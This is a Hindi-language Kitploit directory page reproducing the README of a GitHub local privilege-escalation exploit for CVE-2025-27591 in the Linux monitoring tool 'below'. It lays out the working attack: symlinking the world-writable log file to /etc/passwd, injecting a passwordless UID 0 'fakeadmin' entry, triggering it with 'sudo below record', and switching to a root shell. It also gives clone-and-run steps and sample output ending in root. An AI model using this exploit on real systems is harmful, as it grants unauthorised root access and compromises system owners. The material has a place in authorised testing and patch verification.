Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-27591 — 🔥 स्थानीय विशेषाधिकार वृद्धि एक्सप्लॉइट CVE-2025-27591 के लिए | Below में विश्व-लेखनीय लॉग निर्देशिका का दुरुपयोग करके /etc/passwd इंजेक्शन के माध्यम से रूट प्राप्त करता है | Kitploit
उपकरण/GitHubGitHub/00xcanelo/cve-2025-27591
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण
GitHub00xcanelo/cve-2025-27591

CVE-2025-27591

🔥 स्थानीय विशेषाधिकार वृद्धि एक्सप्लॉइट CVE-2025-27591 के लिए | Below में विश्व-लेखनीय लॉग निर्देशिका का दुरुपयोग करके /etc/passwd इंजेक्शन के माध्यम से रूट प्राप्त करता है

रिपॉजिटरी देखें
2521 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-27591 – below में सिमलिंक दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि

Author CVE

🛑 अस्वीकरण: यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। अनधिकृत उपयोग अवैध हो सकता है।


🧠 अवलोकन

below Facebook द्वारा लिनक्स सिस्टम के लिए विकसित एक प्रदर्शन निगरानी टूल है। पैच किए गए रिलीज़ से पहले के below संस्करण एक गंभीर कमजोरी से प्रभावित हैं जो अन-प्रिविलेज्ड उपयोगकर्ताओं को विश्व-लेखन योग्य लॉग निर्देशिकाओं और असुरक्षित लॉग हैंडलिंग का शोषण करके रूट तक पहुँचने की अनुमति देता है।


🔎 CVE विवरण


💥 एक्सप्लॉइट लॉजिक

यह Bash स्क्रिप्ट निम्नलिखित कार्य करती है:

  1. विश्व-लेखन योग्य निर्देशिका की जाँच:

    • पुष्टि करती है कि /var/log/below विश्व-लेखन योग्य है (एक लाल झंडा)।
  2. सिमलिंक हमले की तैयारी:

    • मौजूदा error_root.log (यदि कोई हो) को हटाती है और /etc/passwd के लिए एक प्रतीकात्मक लिंक बनाती है।
  3. पेलोड निर्माण:

    • /etc/passwd में एक नकली रूट उपयोगकर्ता जोड़ती है:
      root@kitploit:~
      fakeadmin::0:0:fakeadmin:/root:/bin/bash
      
  4. लॉगिंग ट्रिगर:

    • sudo below record चलाकर कमजोर बाइनरी को लॉग लिखने के लिए बाध्य करती है।
  5. रूट एक्सेस प्राप्त करना:

    • बिना पासवर्ड प्रॉम्प्ट के रूट शेल प्राप्त करने के लिए su fakeadmin का उपयोग करती है।

📁 निर्देशिका संरचना

root@kitploit:~
CVE-2025-27591/
├── exploit.sh
├── README.md

✅ आवश्यक शर्तें

एक्सप्लॉइट चलाने से पहले, सुनिश्चित करें कि आपके पास निम्नलिखित हैं:

  • Bash शेल (लिनक्स सिस्टम)
  • कमजोर बाइनरी स्थापित: /usr/bin/below
  • विश्व-लेखन योग्य लॉग निर्देशिका: /var/log/below
  • निष्पादित करने के लिए sudo विशेषाधिकार: sudo below record
  • उपलब्ध उपकरण:
    • ln (सिमलिंक बनाने के लिए)
    • su (उपयोगकर्ता बदलने के लिए)
    • timeout (निष्पादन समय को नियंत्रित करने के लिए)
    • whoami (विशेषाधिकार जाँच के लिए)

🚀 एक्सप्लॉइटेशन चरण

root@kitploit:~
# 1. रिपॉजिटरी क्लोन करें
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. स्क्रिप्ट को निष्पादन योग्य बनाएं
chmod +x exploit.sh

# 3. एक्सप्लॉइट चलाएं
./exploit.sh

🧪 नमूना आउटपुट

root@kitploit:~
[*] CVE-2025-27591 कमजोरी की जाँच की जा रही है...
[+] /var/log/below विश्व-लेखन योग्य है।
[!] मौजूदा लॉग फ़ाइल मिली: उसे हटाया जा रहा है...
[+] सिमलिंक बनाया गया: /var/log/below/error_root.log -> /etc/passwd

[*] /tmp/fakeadmin में दुर्भावनापूर्ण पंक्ति लिखी जा रही है
[*] 'sudo below record' के माध्यम से लॉगिंग ट्रिगर की जा रही है...
[+] 'below record' निष्पादित (या टाइमआउट) हुआ

[*] सिमलिंक के माध्यम से पेलोड को /etc/passwd में लिखने का प्रयास...
[+] पेलोड सफलतापूर्वक जोड़ा गया।

[*] 'su fakeadmin' का उपयोग करके रूट शेल में स्विच करने का प्रयास...
root@target:/# whoami
root
टूल डाउनलोड करें
फ़ील्डमान
CVE-IDCVE-2025-27591
गंभीरता🔥 गंभीर (CVSS ≈ 7.8 - 8.8)
हमला वेक्टरस्थानीय
प्रभावरूट (UID=0) तक विशेषाधिकार वृद्धि
एक्सप्लॉइट प्रकारसिमलिंक दुरुपयोग / लॉग फ़ाइल इंजेक्शन
प्रभावित ऐपbelow – सामान्यतः /usr/bin/below के रूप में स्थापित
मूल कारणअनुमति जाँच के बिना /var/log/below/ में असुरक्षित फ़ाइल लेखन